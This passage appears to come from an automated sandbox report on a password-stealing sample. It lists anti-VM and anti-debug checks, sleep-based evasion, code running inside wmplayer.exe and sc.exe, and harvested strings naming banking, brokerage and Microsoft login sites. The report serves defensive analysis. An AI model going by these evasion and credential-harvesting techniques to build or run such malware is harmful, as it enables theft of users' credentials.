            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code function: 6_2_0334D1C0 rdtsc 6_2_0334D1C0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7145
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2323
            Source: C:\Windows\SysWOW64\sc.exe Window / User API: threadDelayed 9782
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Window / User API: foregroundWindowGot 721
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe API coverage: 0.8 %
            Source: C:\Windows\SysWOW64\sc.exe API coverage: 3.0 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5360 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7012 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\sc.exe TID: 2864 Thread sleep count: 190 > 30
            Source: C:\Windows\SysWOW64\sc.exe TID: 2864 Thread sleep time: -380000s >= -30000s
            Source: C:\Windows\SysWOW64\sc.exe TID: 2864 Thread sleep count: 9782 > 30
            Source: C:\Windows\SysWOW64\sc.exe TID: 2864 Thread sleep time: -19564000s >= -30000s
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe TID: 5204 Thread sleep time: -70000s >= -30000s
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe TID: 5204 Thread sleep time: -37500s >= -30000s
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe TID: 5204 Thread sleep time: -31000s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\sc.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\sc.exe Code function: 13_2_02E1BCA0 FindFirstFileW,FindNextFileW,FindClose,13_2_02E1BCA0
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe File opened: C:\Users\user\AppData
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe File opened: C:\Users\user
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe File opened: C:\Users\user\AppData\Roaming
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: Amcache.hve.9.dr Binary or memory string: VMware
            Source: c23yo28O4.13.dr Binary or memory string: discord.comVMware20,11696487552f
            Source: wmplayer.exe, 0000000F.00000002.3942884266.00000000005F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SATA CD005-21-t
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: Amcache.hve.9.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: c23yo28O4.13.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: c23yo28O4.13.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: wmplayer.exe, 0000000F.00000002.3942884266.00000000005DC000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000000F.00000002.3948423775.00000000073DF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE
            Source: c23yo28O4.13.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: c23yo28O4.13.dr Binary or memory string: global block list test formVMware20,11696487552
            Source: c23yo28O4.13.dr Binary or memory string: tasks.office.comVMware20,11696487552o
            Source: Amcache.hve.9.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: c23yo28O4.13.dr Binary or memory string: AMC password management pageVMware20,11696487552
            Source: c23yo28O4.13.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
            Source: c23yo28O4.13.dr Binary or memory string: dev.azure.comVMware20,11696487552j
            Source: firefox.exe, 00000015.00000002.2617153702.00000190990FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAA
            Source: c23yo28O4.13.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: Amcache.hve.9.dr Binary or memory string: vmci.sys
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
            Source: c23yo28O4.13.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: c23yo28O4.13.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: c23yo28O4.13.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
            Source: Amcache.hve.9.dr Binary or memory string: VMware20,1
            Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.9.dr Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.9.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.9.dr Binary or memory string: VMware PCI VMCI Bus Device
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: Amcache.hve.9.dr Binary or memory string: VMware VMCI Bus Device
            Source: wmplayer.exe, 0000000F.00000002.3948423775.00000000072E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&0000005
            Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual RAM
            Source: Amcache.hve.9.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: wmplayer.exe, 0000000F.00000002.3948423775.00000000073B7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW2v
            Source: wmplayer.exe, 0000000F.00000002.3942884266.000000000060A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Amcache.hve.9.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: c23yo28O4.13.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: NwXvnHITawmpBkkZKEXJ.exe, 0000000E.00000002.3945109177.000000000164F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
            Source: c23yo28O4.13.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: c23yo28O4.13.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
            Source: c23yo28O4.13.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.9.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
            Source: wmplayer.exe, 0000000F.00000002.3945969013.0000000005500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00-5-21-2246122658-3693405117-2476756634-1003_Classes\WOW6432Node\Interface\{27354133-7F64-5B0F-8F00-5D77AFBE261E}\P
            Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: wmplayer.exe, 0000000F.00000002.3945969013.0000000005500000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00-
            Source: c23yo28O4.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
            Source: Amcache.hve.9.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: sc.exe, 0000000D.00000002.3942849584.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000011.00000003.2443465756.000002454956E000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000011.00000003.2445206793.000002454956F000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000011.00000003.2442667644.000002454956E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: c23yo28O4.13.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: c23yo28O4.13.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.9.drBinary or memory string: \driver\vmci,\driver\pci
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0C0D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: Amcache.hve.9.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: c23yo28O4.13.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: c23yo28O4.13.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: c23yo28O4.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: c23yo28O4.13.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: c23yo28O4.13.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: Amcache.hve.9.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: c23yo28O4.13.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: c23yo28O4.13.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: c23yo28O4.13.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: c23yo28O4.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: wmplayer.exe, 0000000F.00000002.3942884266.00000000005F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00eri
            Source: c23yo28O4.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: c23yo28O4.13.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe; Process queried: DebugPort
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe; Process queried: DebugPort
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Process queried: DebugPort
            Source: C:\Windows\SysWOW64\sc.exe; Process queried: DebugPort
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0334D1C0 rdtsc
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_004175A3 LdrLoadDll,
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032FF32A mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0339132D mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0339132D mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032C7330 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0330A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0330A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0330A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032CC310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0335930B mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0335930B mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0335930B mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032F0310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0337437C mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032D7370 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032D7370 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032D7370 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0338F367 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032CD34C mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032CD34C mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0335035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0335035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0335035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0335035C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0335035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0335035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0339A352 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033A5341 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03352349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032C9353 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032C9353 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032F33A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033033A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033033A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032F438F mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032F438F mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032CE388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032CE388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032CE388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033A539D mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0332739A mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0332739A mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032C8397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032C8397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032C8397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033A53FC mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032E03E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032E03E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032E03E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032E03E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032E03E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032E03E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032E03E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032E03E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033063FF mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032EE3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032EE3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032EE3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0338F3E6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0338B3D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032DA3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032DA3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032DA3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032DA3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032DA3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032DA3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032D83C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032D83C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032D83C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032D83C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0338C3CD mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032C823B mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_033A5227 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03307208 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03307208 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03311270 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03311270 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032C826B mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_03380274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032D4260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032D4260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032D4260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0339D26B mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_0339D26B mov eax, dword ptr fs:[00000030h]
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe; Code function: 6_2_032F9274 mov eax, dword ptr fs:[00000030h]
